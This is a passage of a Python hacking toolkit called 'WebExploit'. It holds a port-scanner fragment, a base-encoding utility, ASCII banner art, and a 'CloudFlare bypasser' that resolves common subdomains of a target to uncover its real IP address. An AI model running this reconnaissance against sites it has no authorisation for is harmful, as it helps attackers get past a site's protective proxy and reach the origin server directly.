{f.WHITE}[{f.RED}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{red}NOT-OPEN-PORT:{bold}{f.GREEN}{port}{nbold}{f.BLUE}] HOST {f.WHITE}~> [{f.RED}{bold}{ipqq}{nbold}[{host_error}]{f.WHITE}] \n') 513 | 514 | 515 | 516 | 517 | 518 | 519 | 520 | 521 | #ip_range2 = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}IP-RANGE[oct[3]]{nbold}{f.WHITE} enter \'IP-RANGE-{bold}0-255{nbold}\' | (ex: 255) [only type 255 !]:#{f.GREEN}{bold} ') 522 | 523 | 524 | 525 | 526 | 527 | 528 | 529 | 530 | 531 | 532 | 533 | 534 | 535 | 536 | 537 | 538 | 539 | 540 | 541 | 542 | 543 | 544 | # print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} You Entered {bold}NOT VALID{f.WHITE}{nbold}[{bold}{f.YELLOW}IP-ADDR{nbold}{f.WHITE}] NOT VALID {f.WHITE} [{red}{bold}{ip_error}{nbold}{l_white}].\n') 545 | #sys.exit(0) 546 | #print (f'\n {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}A.P.S/{bold}iP{nbold}{f.WHITE}] {f.CYAN}TARGET-IP{f.WHITE} >>> {bold}{ip_addr}{nbold}\n') 547 | 548 | 549 | #print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} You Entered {bold}NOT VALID{f.WHITE}{nbold}[{bold}{f.YELLOW}IP-ADDR{nbold}{f.WHITE}] OUT OF RANGE{f.WHITE} {red}{bold}{ip_error}{nbold}{l_white}.\n') 550 | # g = socket.create_connection(("1.1.1.1",80)) 551 | 552 | # socket.setdefaulttimeout(10) 553 | # print(f' {f.WHITE}[{f.GREEN}{bold}WebExploit{nbold}{f.WHITE}@{nbold}{f.RED}A.P.S/{f.WHITE}{bold}CONNECTOR{nbold}{f.WHITE}] {red} Can\'t Load {bold}CONNECTOR !{nbold}{yellow}Error: {bold}{connector_error}{nbold} \n') 554 | 555 | 556 | 557 | # print(f' {f.WHITE}[{f.GREEN}{bold}WebExploit{nbold}{f.WHITE}@{nbold}{f.RED}A.P.S/{f.WHITE}{bold}CONNECTOR{nbold}{f.WHITE}] LOADED {bold} CONNECTOR {nbold} Loaded {bold}{green}Successfully...{nbold}\n') 558 | 559 | 560 | -------------------------------------------------------------------------------- /cores/b64.py: -------------------------------------------------------------------------------- 1 | def run(): 2 | ''' 3 | MIT License 4 | 5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r] 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy 8 | of this software and associated documentation files (the "Software"), to deal 9 | in the Software without restriction, including without limitation the rights 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | copies of the Software, and to permit persons to whom the Software is 12 | furnished to do so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | ''' 25 | 'pip install google-search' 26 | try: 27 | import time as t 28 | from colorama import Fore as f 29 | import sys, os 30 | import requests as r 31 | import paramiko 32 | from random import choice 33 | import base64 34 | import binascii 35 | except: 36 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !") 37 | t.sleep(1) 38 | sys.exit() 39 | 40 | black = "\033[0;30m" 41 | red = "\033[0;31m" 42 | green = "\033[0;32m" 43 | brown = "\033[0;33m" 44 | blue = "\033[0;34m" 45 | purple = "\033[0;35m" 46 | cyan = "\033[0;36m" 47 | l_gray = "\033[0;37m" 48 | dark_gray = "\033[1;30m" 49 | l_red = "\033[1;31m" 50 | l_green = "\033[1;32m" 51 | yellow = "\033[1;33m" 52 | l_blue = "\033[1;34m" 53 | l_purple = "\033[1;35m" 54 | l_cyan = "\033[1;36m" 55 | l_white = "\033[1;37m" 56 | faint = "\033[2m" 57 | italic = "\033[3m" 58 | underline = "\033[4m" 59 | blink = "\033[5m" 60 | nefative = "\033[7m" 61 | cross = "\033[9m" 62 | ended = "\033[0m" 63 | bold = "\033[1m" 64 | nbold = "\033[0m" 65 | white = f.WHITE 66 | 67 | bnr = [''' 68 | ▄▄▄▄· ▄▄▄ . ·▄▄▄▄ 69 | ▐█ ▀█▪ ▀▄.▀· ██· ██ 70 | ▐█▀▀█▄ ▐▀▀▪▄ ▐█▪ ▐█▌ 71 | ██▄▪▐█ ▐█▄▄▌ ██. ██ 72 | ·▀▀▀▀ ▀▀▀ ▀▀▀▀▀• ''', ''' 73 | ▄▄▄▄ ▓█████ ▓█████▄ 74 | ▓█████▄ ▓█ ▀ ▒██▀ ██▌ 75 | ▒██▒ ▄██ ▒███ ░██ █▌ 76 | ▒██░█▀ ▒▓█ ▄ ▒░▓█▄ ▌ 77 | ▒░▓█ ▀█▓ ░▒████ ░░▒████▓ 78 | ░░▒▓███▀▒ ░░ ▒░ ░ ▒▒▓ ▒ 79 | ░▒░▒ ░ ░ ░ ░ ▒ ▒ 80 | ░ ░ ░ ░ ░ ░ 81 | ░ ░ ░ ░ '''] 82 | 83 | def r_bnr(bnr): 84 | return choice(bnr) 85 | 86 | print (f'{blink}{r_bnr(bnr)}{ended}', end='') 87 | t.sleep(2) 88 | print(f' {italic}From{ended} : ', end='') 89 | #create flush text [simple] 90 | print(f'{red}{bold}', end='', flush=True) 91 | print(f'{bold}W', end='', flush=True) 92 | t.sleep(0.5) 93 | print('e', end='', flush=True) 94 | t.sleep(0.7) 95 | print('b', end='', flush=True) 96 | t.sleep(0.4) 97 | print('E', end='', flush=True) 98 | t.sleep(0.1) 99 | print('x', end='', flush=True) 100 | t.sleep(0.2) 101 | print('p', end='', flush=True) 102 | t.sleep(0.3) 103 | print('l', end='', flush=True) 104 | t.sleep(0.4) 105 | print('o', end='', flush=True) 106 | t.sleep(0.5) 107 | print('i', end='', flush=True) 108 | t.sleep(1.5) 109 | print(f't{ended}', flush=True) 110 | nbold = "\033[0m" # tahe koskholi ! 111 | t.sleep(1) 112 | print(f'{white}{nbold}') 113 | # SIMPLE TOOL ! 114 | print (f'\n {bold}{f.GREEN}[{f.WHITE}B*TOOL{f.GREEN}]{f.WHITE}{f.RED} B64-DEC-ENC{f.WHITE}{bold} BASE 16,32,64,85{nbold}.DEC.ENC{nbold} DECODER T00L !\n\n\n') 115 | t.sleep(3) 116 | 117 | 118 | 119 | 120 | while True: 121 | try: 122 | string = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}B64-DEC-ENC/{bold}DECODER-ENCODER{nbold}{f.WHITE} T00L . enter Your {bold}\'string{nbold}\' [ex: WebExploit | V2ViRXhwbG9pdAo=]:#{f.RED}{bold} ') 123 | print(f'{nbold}') 124 | 125 | if string: 126 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}B*/{bold}ENC-DEC{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{string}{nbold}\n') 127 | t.sleep(1) 128 | break 129 | else: 130 | continue 131 | 132 | except KeyboardInterrupt: 133 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 134 | t.sleep(2) 135 | # break 136 | sys.exit(0) 137 | 138 | t.sleep(2) 139 | strtype =input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}B64-DEC-ENC/{bold}DEC-ENC{nbold}{f.WHITE} T00L . enter Your {bold}\'MODE{nbold}\' [ex: [1] DECODE, [2] ENCODE ]:#{f.BLUE}{bold} ') 140 | print(f'{nbold}') 141 | t.sleep(2) 142 | 143 | if strtype == '1' or strtype =='dec' or strtype == 'decode': 144 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}B*/DECODER/{bold}STRING{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{string}{nbold}\n') 145 | try: 146 | t.sleep(2) 147 | base16_bytes = string 148 | base16_bytes = base64.b16decode(base16_bytes) 149 | base16_message = base16_bytes.decode('ascii') 150 | t.sleep(1) 151 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}16{nbold}/{bold}DECODER{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{base16_message}{nbold}\n') 152 | except Exception as err: 153 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}16{nbold}/{bold}DECODER{nbold}{f.WHITE}]{f.RED} SKIPPING {white}{bold}BASE 16 \'TYPE\'{nbold} Error: {err}\n') 154 | 155 | try: 156 | t.sleep(2) 157 | #string.decode('ascii') 158 | base32_bytes = string 159 | base32_bytes = base64.b32decode(base32_bytes) 160 | base32_message = base32_bytes.decode('ascii') 161 | t.sleep(1) 162 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}32{nbold}/{bold}DECODER{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{base32_message}{nbold}\n') 163 | except Exception as err: 164 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}32{nbold}/{bold}DECODER{nbold}{f.WHITE}]{f.RED} SKIPPING {white}{bold}BASE 32 \'TYPE\'{nbold} Error: {err}\n') 165 | try: 166 | t.sleep(2) 167 | base64_bytes = string 168 | base64_bytes = base64.b64decode(base64_bytes) 169 | base64_message = base64_bytes.decode('ascii') 170 | t.sleep(1) 171 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}64{nbold}/{bold}DECODER{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{base64_message}{nbold}\n') 172 | except Exception as err: 173 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}64{nbold}/{bold}DECODER{nbold}{f.WHITE}]{f.RED} SKIPPING {white}{bold}BASE 64 \'TYPE\'{nbold} Error: {err}\n') 174 | try: 175 | t.sleep(2) 176 | base85_bytes = string 177 | base85_bytes = base64.b85decode(base85_bytes) 178 | base85_message = base85_bytes.decode('ascii') 179 | t.sleep(1) 180 | print (f'\n {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}85{nbold}/{bold}DECODER{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{base85_message}{nbold}\n') 181 | except Exception as err: 182 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}85{nbold}/{bold}DECODER{nbold}{f.WHITE}]{f.WHITE} SKIPPING {white}{bold}BASE 85 \'TYPE\'{nbold}\n') 183 | 184 | elif strtype == '2' or strtype =='enc' or strtype == 'encode': 185 | print (f'\n {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}B*/DECODER/{bold}STRING{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{string}{nbold}\n') 186 | t.sleep(2) 187 | base16_bytes = string.encode('ascii') 188 | base16_bytes = base64.b16encode(base16_bytes) 189 | base16_message = base16_bytes.decode('ascii') 190 | t.sleep(1) 191 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{white}{bold}16{nbold}/{bold}ENCODER{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{base16_message}{nbold}\n') 192 | t.sleep(2) 193 | base32_bytes = string.encode('ascii') 194 | base32_bytes = base64.b32encode(base32_bytes) 195 | base32_message = base32_bytes.decode('ascii') 196 | t.sleep(1) 197 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{white}{bold}32{nbold}/{bold}ENCODER{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{base32_message}{nbold}\n') 198 | t.sleep(1) 199 | base64_bytes = string.encode('ascii') 200 | base64_bytes = base64.b64encode(base64_bytes) 201 | base64_message = base64_bytes.decode('ascii') 202 | t.sleep(1) 203 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}64{nbold}/{bold}ENCODER{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{base64_message}{nbold}\n') 204 | t.sleep(1) 205 | base85_bytes = string.encode('ascii') 206 | base85_bytes = base64.b85encode(base85_bytes) 207 | base85_message = base85_bytes.decode('ascii') 208 | t.sleep(1) 209 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}BASE{nbold}{bold}85{nbold}/{bold}ENCODER{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{base85_message}{nbold}\n') 210 | else: 211 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] WHAT? {bold}\'{string}\'{nbold} ? EXITTING . . .') 212 | t.sleep(2) 213 | sys.exit(0) 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | -------------------------------------------------------------------------------- /cores/baner.py: -------------------------------------------------------------------------------- 1 | def baner(): 2 | 3 | from random import choice as c 4 | from colorama import Fore as cc 5 | 6 | baners = [f'''{cc.RED} 7 | ▄▄▌ ▐ ▄▌▄▄▄ .▄▄▄▄· ▄▄▄ .▐▄• ▄ ▄▄▄·▄▄▌ ▪ ▄▄▄▄▄ 8 | ██· █▌▐█▀▄.▀·▐█ ▀█▪ ▀▄.▀· █▌█▌▪▐█ ▄███• ▄█▀▄ ██ •██ 9 | ██▪▐█▐▐▌▐▀▀▪▄▐█▀▀█▄ ▐▀▀▪▄ ·██· ██▀·██ ▪ ▐█▌.▐▌▐█· ▐█.▪ 10 | ▐█▌██▐█▌▐█▄▄▌██▄▪▐█ ▐█▄▄▌▪▐█·█▌▐█▪·•▐█▌ ▄▐█▌.▐▌▐█▌ ▐█▌· 11 | ▀▀▀▀ ▀▪ ▀▀▀ ·▀▀▀▀ ▀▀▀ •▀▀ ▀▀.▀ .▀▀▀ ▀█▄▀▪▀▀▀ ▀▀▀ 12 | {cc.WHITE}''',f'''{cc.RED} 13 | \ \ / | ____| | _) | 14 | \ \ \ / _ \ __ \ __| \ / __ \ | _ \ | __| 15 | \ \ \ / __/ | | | < | | | ( | | | 16 | \_/\_/ \___| _.__/ _____|_/\_\ .__/ _| \___/ _| \__| 17 | _| 18 | {cc.WHITE}''',f'''{cc.RED} 19 | ▀▄▀▄▀ 🢇 ꔪ 🢇 🞮 ▐◣ █▄ 🞉 █ ▀█▀ 20 | {cc.WHITE}''',f'''{cc.RED} 21 | █ █ ██▀ ██▄ ██▀ ▀▄▀ █▀▄ █ ▄▀▄ █ ▀█▀ 22 | ▀▄▀▄▀ █▄▄ █▄█ █▄▄ █ █ █▀ █▄▄ ▀▄▀ █ █ {cc.WHITE}''',f'''{cc.RED} 23 | 24 | | | _ | ____ __ | _ o _|_ 25 | |/\| (/_ |] |== >< |-' |_ [_] | |_ 26 | 27 | {cc.WHITE}''',f'''{cc.RED} 28 | __ _ 29 | \ / _ |_ |_ |_)| _ ._|_ 30 | \/\/ (/_|_) |__><| |(_) | |_ 31 | 32 | {cc.WHITE}''',f'''{cc.RED} 33 | ___ 34 | \ / _ ( _ )_ _ ) __ o_)_ 35 | \/\/ )_) )_) (__ (/ )_) ( (_/ ((_ 36 | (_ /)( 37 | 38 | {cc.WHITE}''',f'''{cc.RED} 39 | __ 40 | | | _ |_ |_ _ | _ o|_ 41 | |/\|(-`|_) |__><|_)|(_)||_ 42 | | 43 | {cc.WHITE}''',f'''{cc.RED} 44 | _ _ _ _ ____ _ /\ _|_ 45 | | | | |_\ |__ |___ \/ |_] |/ __ . | 46 | |_|_| |__ |__] |___ /\ | | |__| | |_ 47 | 48 | {cc.WHITE}''',f'''{cc.RED} 49 | _ ____ ___ ____ _ ___ _ ___ _ _____ 50 | \ \ / | |_ | |_) | |_ \ \_/ | |_) | | / / \ | | | | 51 | \_\/\/ |_|__ |_|_) |_|__ /_/ \ |_| |_|__ \_\_/ |_| |_| 52 | 53 | {cc.WHITE}''',f'''{cc.RED} 54 | _ _ _ _ ___ _ _ _ 55 | | | | | ___ | |_ | __]__ ___ | | ___ [_] _| |_ 56 | | | | |/ ._]| . \ | _] \ \/| . \| |/ . \| | | | 57 | |__/_/ \___.|___/ |___]/\_\| _/|_|\___/|_| |_| 58 | |_| 59 | {cc.WHITE}''',f'''{cc.RED} 60 | _ _ ____ ____ ____ _ _ ____ __ _____ ____ ____ 61 | ( \/\/ )( ___)( - \ ( ___)( \/ )( _ \( ) ( _ )(_ _)(_ _) 62 | ) ( )__) ) _ < )__) ) ( )___/ )(__ )(_)( _)(_ )( 63 | (__/\__)(____)(____/ (____)(_/\_)(__) (____)(_____)(____) (__) 64 | 65 | {cc.WHITE}''',f'''{cc.RED} 66 | _ _ _ _ _____ _ _ _ 67 | | | | |___| |_ | __|_ _ ___| |___|_| |_ 68 | | | | | -_| . | | __|_|_| . | | . | | _| 69 | |_____|___|___| |_____|_|_| _|_|___|_| | 70 | |_| |__| 71 | {cc.WHITE}''',f'''{cc.RED} 72 | █ █░ ▓█████ ▄▄▄▄ ▓█████▒██ ██▒ ██▓███ ██▓ ▒█████ ██▓▄▄▄█████▓ 73 | ▓█░ █ ░█░ ▓█ ▀▓█████▄ ▓█ ▀▒▒ █ █ ▒░▓██░ ██ ▓██▒ ▒██▒ ██▒▒▓██▒▓ ██▒ ▓▒ 74 | ▒█░ █ ░█ ▒███ ▒██▒ ▄██ ▒███ ░░ █ ░▓██░ ██▓▒ ▒██░ ▒██░ ██▒▒▒██▒▒ ▓██░ ▒░ 75 | ░█░ █ ░█ ▒▓█ ▄▒██░█▀ ▒▓█ ▄ ░ █ █ ▒ ▒██▄█▓▒ ▒ ▒██░ ▒██ ██░░░██░░ ▓██▓ ░ 76 | ░░██▒██▓ ▒░▒████░▓█ ▀█▓ ░▒████▒██▒ ▒██▒▒██▒ ░ ░▒░██████░ ████▓▒░░░██░ ▒██▒ ░ 77 | ░ ▓░▒ ▒ ░░░ ▒░ ░▒▓███▀▒ ░░ ▒░ ▒▒ ░ ░▓ ░▒▓▒░ ░ ░░░ ▒░▓ ░ ▒░▒░▒░ ░▓ ▒ ░░ 78 | ▒ ░ ░ ░ ░ ░ ▒░▒ ░ ░ ░ ░░ ░▒ ░░▒ ░ ░░ ░ ▒ ░ ▒ ▒░ ░ ▒ ░ ░ 79 | ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ▒ ░ ▒ ░ ░ 80 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 81 | 82 | {cc.WHITE}''',f'''{cc.RED} 83 | ┏┓┏┓┏┓━━━┓━━━━━━━━┓━━━━━━┓━━━━━┏┓━ 84 | ┃┃┃┃┃┃━━━┃━━━━━┏━━┛━━━━━━┃━━━━━┛┗┓ 85 | ┃┃┃┃┃┃━━┓┗━┓━━━┗━━┓┓┏┓━━┓┃━━━┓┓┓┏┛ 86 | ┃┗┛┗┛┃┏┓┃┏┓┃━━━┏━━┛╋╋┛┏┓┃┃━┏┓┃┫┃┃━ 87 | ┗┓┏┓┏┛┃━┫┗┛┃━━━┗━━┓╋╋┓┗┛┃┗┓┗┛┃┃┃┗┓ 88 | ━┗┛┗┛━━━┛━━┛━━━━━━┛┛┗┛┏━┛━┛━━┛┛┗━┛ 89 | ━━━━━━━━━━━━━━━━━━━━━━┃━━━━━━━━━━━ 90 | ━━━━━━━━━━━━━━━━━━━━━━┛━━━━━━━━━━━ 91 | 92 | {cc.WHITE}''',f'''{cc.RED} 93 | ╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋ 94 | ╭╮╭╮╭╮╋╋╋╮╋╋╋╋╋━━━╮╋╋╋╋╋╋╮╋╋╋╋╋╭╮╋ 95 | ┃┃┃┃┃┃╋╋╋┃╋╋╋╋╋╭━━╯╋╋╋╋╋╋┃╋╋╋╋╋╯╰╮ 96 | ┃┃┃┃┃┃━━╮╰━╮╋╋╋╰━━╮╮╭╮━━╮┃╋━━╮╮╮╭╯ 97 | ┃╰╯╰╯┃╭╮┃╭╮┃╋╋╋╭━━╯╋╋╯╭╮┃┃╋╭╮┃┫┃┃╋ 98 | ╰╮╭╮╭╯┃━┫╰╯┃╋╋╋╰━━╮╋╋╮╰╯┃╰╮╰╯┃┃┃╰╮ 99 | ╋╰╯╰╯╋━━╯━━╯╋╋╋━━━╯╯╰╯╭━╯━╯━━╯╯╰━╯ 100 | ╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋┃╋╋╋╋╋╋╋╋╋╋╋ 101 | ╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╋╯╋╋╋╋╋╋╋╋╋╋╋ 102 | 103 | {cc.WHITE}''',f'''{cc.RED} 104 | █ █ ██▀ ██▄ ██▀ ▀▄▀ █▀▄ █ ▄▀▄ █ ▀█▀ 105 | ▀▄▀▄▀ █▄▄ █▄█ █▄▄ █ █ █▀ █▄▄ ▀▄▀ █ █ 106 | 107 | {cc.WHITE}'''] 108 | return c(baners) 109 | 110 | 111 | 112 | 113 | 114 | 115 | -------------------------------------------------------------------------------- /cores/cfb.py: -------------------------------------------------------------------------------- 1 | def run(): 2 | ''' 3 | MIT License 4 | 5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r] 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy 8 | of this software and associated documentation files (the "Software"), to deal 9 | in the Software without restriction, including without limitation the rights 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | copies of the Software, and to permit persons to whom the Software is 12 | furnished to do so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | ''' 25 | try: 26 | import time as t 27 | from colorama import Fore as f 28 | import sys, os 29 | import socket 30 | from random import choice 31 | except: 32 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !") 33 | t.sleep(1) 34 | sys.exit() 35 | 36 | black = "\033[0;30m" 37 | red = "\033[0;31m" 38 | green = "\033[0;32m" 39 | brown = "\033[0;33m" 40 | blue = "\033[0;34m" 41 | purple = "\033[0;35m" 42 | cyan = "\033[0;36m" 43 | l_gray = "\033[0;37m" 44 | dark_gray = "\033[1;30m" 45 | l_red = "\033[1;31m" 46 | l_green = "\033[1;32m" 47 | yellow = "\033[1;33m" 48 | l_blue = "\033[1;34m" 49 | l_purple = "\033[1;35m" 50 | l_cyan = "\033[1;36m" 51 | l_white = "\033[1;37m" 52 | faint = "\033[2m" 53 | italic = "\033[3m" 54 | underline = "\033[4m" 55 | blink = "\033[5m" 56 | nefative = "\033[7m" 57 | cross = "\033[9m" 58 | ended = "\033[0m" 59 | bold = "\033[1m" 60 | nbold = "\033[0m" 61 | white = f.WHITE 62 | 63 | bnr = [''' 64 | ▄████▄ █████ ▄▄▄▄ 65 | ▒██▀ ▀█ ▓██ ▓█████▄ 66 | ▒▓█ ▄ ▒████ ▒██▒ ▄██ 67 | ▒▓▓▄ ▄██ ░▓█▒ ▒██░█▀ 68 | ▒ ▓███▀ ▒░▒█░ ▒░▓█ ▀█▓ 69 | ░ ░▒ ▒ ░ ▒ ░ ░░▒▓███▀▒ 70 | ░ ▒ ░ ░ ░▒░▒ ░ 71 | ░ ░ ░ ░ ░ 72 | ░ ░ ░ ░ ░ ''', ''' 73 | ▄▄· ·▄▄▄ ▄▄▄▄· 74 | ▐█ ▌▪ █ · ▐█ ▀█▪ 75 | ██ ▄▄ █▀▀▪ ▐█▀▀█▄ 76 | ▐███▌ ██ . ██▄▪▐█ 77 | ·▀▀▀ ▀▀▀ ·▀▀▀▀ '''] 78 | 79 | def r_bnr(bnr): 80 | return choice(bnr) 81 | 82 | print (f'{blink}{r_bnr(bnr)}{ended}', end='') 83 | t.sleep(2) 84 | print(f' {italic}From{ended} : ', end='') 85 | #create flush text [simple] 86 | print(f'{red}{bold}', end='', flush=True) 87 | print(f'{bold}W', end='', flush=True) 88 | t.sleep(0.5) 89 | print('e', end='', flush=True) 90 | t.sleep(0.7) 91 | print('b', end='', flush=True) 92 | t.sleep(0.4) 93 | print('E', end='', flush=True) 94 | t.sleep(0.1) 95 | print('x', end='', flush=True) 96 | t.sleep(0.2) 97 | print('p', end='', flush=True) 98 | t.sleep(0.3) 99 | print('l', end='', flush=True) 100 | t.sleep(0.4) 101 | print('o', end='', flush=True) 102 | t.sleep(0.5) 103 | print('i', end='', flush=True) 104 | t.sleep(1.5) 105 | print(f't{ended}', flush=True) 106 | nbold = "\033[0m" # tahe koskholi ! 107 | t.sleep(1) 108 | print(f'{white}{nbold}') 109 | 110 | print (f'\n {bold}{f.GREEN}[{f.WHITE}CFB{f.GREEN}]{f.WHITE}{f.RED} C.F.B{f.WHITE}{bold} C{nbold}LOAD {bold}F{nbold}LARE {bold}B{nbold}YPASSER T00L !\n\n\n') 111 | t.sleep(3) 112 | 113 | 114 | while True: 115 | try: 116 | url = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}C.F.B/{bold}URL{nbold}{f.WHITE} enter \'{bold}URL{nbold}\' [ex: youtube.com]:#{f.GREEN}{bold} ') 117 | print(f'{nbold}') 118 | 119 | if url: 120 | if 'http' not in url: 121 | break 122 | if 'https://' not in url: 123 | break 124 | else: 125 | print(f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] ENTER URL WITHOUT {bold}HTTP:// OR HTTPS://{nbold} TRY AGAIN . . .\n') 126 | t.sleep(1) 127 | continue 128 | else: 129 | continue 130 | except KeyboardInterrupt: 131 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 132 | t.sleep(2) 133 | # break 134 | sys.exit(0) 135 | 136 | subdomain = (f'{os.getcwd()}/cores/subdomains.txt') 137 | subdomains = open(subdomain, 'r').read().split() 138 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}C.F.B/{f.CYAN}DEFAULT{f.WHITE}] OPENNING {bold}DEFAULT{nbold} TOP SUBDOMAINS FILE {bold}{f.GREEN}\n') 139 | t.sleep(2) 140 | print (f' {nbold}{f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}W.P.F/{f.CYAN}DEFAULT{f.WHITE}] LOADED {bold}%s SUBDOMAINS{nbold}{f.GREEN} SUCCESS ...{white}\n' % len(subdomains)) 141 | t.sleep(2) 142 | try: 143 | for sub in subdomains: 144 | try: 145 | finally_host = str(sub) + "." + str(url) 146 | bypassed_host = socket.gethostbyname(str(finally_host)) 147 | 148 | print (f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}CFB/{f.WHITE}STATUS-{bold}{f.GREEN}SUCCESS{nbold}{f.WHITE}] REAL-IP-ADDR {f.WHITE}~> [{f.GREEN}{bold}{bypassed_host}{nbold}{f.WHITE}]---[{finally_host}] \n') 149 | 150 | except Exception as socket_err: 151 | print (f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}CFB/{f.WHITE}STATUS-{bold}{f.RED}ERROR{nbold}{f.WHITE}] CAN\'T BYPASS ERROR: {f.WHITE}~> [{f.RED}{bold}{socket_err}{nbold}{f.WHITE}]---[{finally_host}] \n') 152 | except KeyboardInterrupt: 153 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 154 | t.sleep(2) 155 | sys.exit(0) 156 | 157 | 158 | 159 | 160 | -------------------------------------------------------------------------------- /cores/cms.py: -------------------------------------------------------------------------------- 1 | def run(): 2 | ''' 3 